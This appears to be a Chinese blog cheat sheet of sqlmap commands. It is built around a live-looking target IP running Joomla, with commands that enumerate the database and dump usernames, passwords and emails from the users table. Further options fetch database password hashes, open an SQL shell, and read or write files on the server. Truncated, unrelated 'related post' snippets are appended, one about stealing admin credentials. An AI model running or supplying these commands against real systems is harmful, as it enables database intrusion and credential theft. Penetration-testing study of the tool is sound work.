sqlmap注入命令大全
sqlmap -u "注入点地址" --dbs扫描数据库
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla --tables 打开数据库中的 ”joomla表格
sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla -T '#__users' --columns 打开#——users 列
sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla -T '#__users' -C username,password,email --dump
指定列中选项查看
--users 获取数据库所有用户(数据库登陆账户)
--passwprds 获取数据库用户密码(数据库登录密码)
--current-user 当前网站数据库的用户名称
任何命令后跟batch(一切选项选择默认)
进阶:
探测等级 --level 5 (一共有五个等级,默认等级是1,等级五最高,但是也最慢)
level5能自动破解出cookie,xff等头部注入。
--is-dba 探测账户是否有超级管理员权限 (true是,false否)
--roles:列出数据库管理员的角色
--refere:HTTP Referer头 如:referer http://baidu.com(此指令可以对referer头注入,可以使用referer命令欺骗,但要求level在3以上)
--sql-shell【(此指令使用后可以直接使用mysql语言查询)很强!】
--file-read:从数据库服务器中读取文件 例如:sqlmap.py -u “xxxxxxxx”--file-read “C:/”【读取c盘中的全部文件】
--file-write “上传文件路径” --file-dest “目标文件系统绝对路径”
mysql5.0版本之后,mysql默认在数据库中存放一个‘information schema‘的数据库我们需要记住三个表名分别是schemata,tables,columns。
schemata表储存了该用户创建的所有数据库i库名和需要记住该表中记录数据库的字段名为schema name
tables表储存了该用户创建的所有数据库表名,记录数据库表名的字段名为:tables schema和table name
coulmns表储存了用户创建数据库的库名,表名,字段名,要记住该表中记录数据库,库名,表名,字段名为:talbe schema,table name,columns name
sqlmap注入命令大全相关推荐
- SQLMap使用|命令大全(干货)
SQLMap简介 SQLMap是一款开源的渗透测试工具,它可以自动检测和利用SQL注入漏洞,并对数据库执行相应的攻击. SQLMap的强大的功能包括:数据库指纹识别.数据库枚举.数据提取.密码hash ...
- 利用sqlmap注入获取网址管理员账号密码
1.跨站脚本 原理:指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料.利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式. ( ...
- sqlmap工具命令行的含义
SQLMAP参数介绍 sqlmap的使用方式:python sqlmap.py [options]: sqlmap中一共有以下十六个选项卡: 帮助选项卡: Target(目标选项卡): Request ...
- SQLMAP注入教程-11种常见SQLMAP使用方法
一.SQLMAP用于Access数据库注入 (1)猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.a ...
- Web安全工具—Sqlmap常用命令和参数(持续更新)
Web安全工具-SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习. 一:SQLMAP介绍: 简介:sqlmap是一个由p ...
- 全网最优质的思科设备命令大全
前两天给大家分享了H3C和华为的命令大全,得到了大家的认可,昨天有粉丝在华为命令大全中提到锐捷相关的命令大全,我寻思了一下,其实思科和锐捷的命令是相近的,所以想着直接整理一下思科的就可以了,希望大家能 ...
- DOS命令大全 黑客必知的DOS命令集合
一般来说dos命令都是在dos程序中进行的,如果电脑中安装有dos程序可以从开机选项中选择进入,在windows 系统中我们还可以从开始运行中输入cmd命令进入操作系统中的dos命令,如下图: 严格的 ...
- linux mysql 命令 大全
linux mysql 命令 大全 1.linux下启动mysql的命令: mysqladmin start /ect/init.d/mysql start (前面为mysql的安装路径) 2.l ...
- Linux_学习_01_常用命令大全
一.文件目录 1.列出目录 ls -a #显示隐藏文件 -l #显示文件和目录的详细资料 -h-lrttree #显示文件和目录由根目录开始的树形结构 lstree #显示文件和目录由根目录开始的树形 ...
- Ubuntu常用命令大全[显示桌面]
Ubuntu常用命令大全 查看软件xxx安装内容 #dpkg -L xxx 查找软件 #apt-cache search 正则表达式 查找文件属于哪个包 #dpkg -S filename apt-f ...
最新文章
- msteel能计算钢结构楼梯吗_坚持爬楼梯能减肥吗 怎么爬楼梯可以减肥
- 目标检测---Segmentation Is All You Need
- 关联查询取更新时间_数据分析之sql复杂查询
- 聊聊微信的Dark模式
- 注解 @PostConstruct 与 @PreDestroy 详解及实例
- 物联网避坑 3 大指南!
- win7电脑上的文件打开方式选错了怎么办
- C#LeetCode刷题之#66-加一(Plus One)
- sqlachemy入门基础手册
- Unity3d官方测试插件学习-单元测试,集成测试
- git push失败:ssh:connect to host github.com port 22:Connection timed out
- IBM - 开拓语音识别 - 概述 - 中国
- restapi(3)- MongoDBEngine : MongoDB Scala编程工具库
- Cocos Creator制作一个虚拟摇杆
- iPhone大小的盒子服务器Cubieboard
- 【转载】爷爷和我---来自泊小豆的微博
- android模拟器安装frida
- php的表达爱意的一句代码,表达爱意的诗句15个字
- 使用MySQL查找姓名重名_查询名字有多少人重名,全国同名同姓查询全国姓名数据库...
- 颜色迁移之一——基础知识(色彩空间及其转换)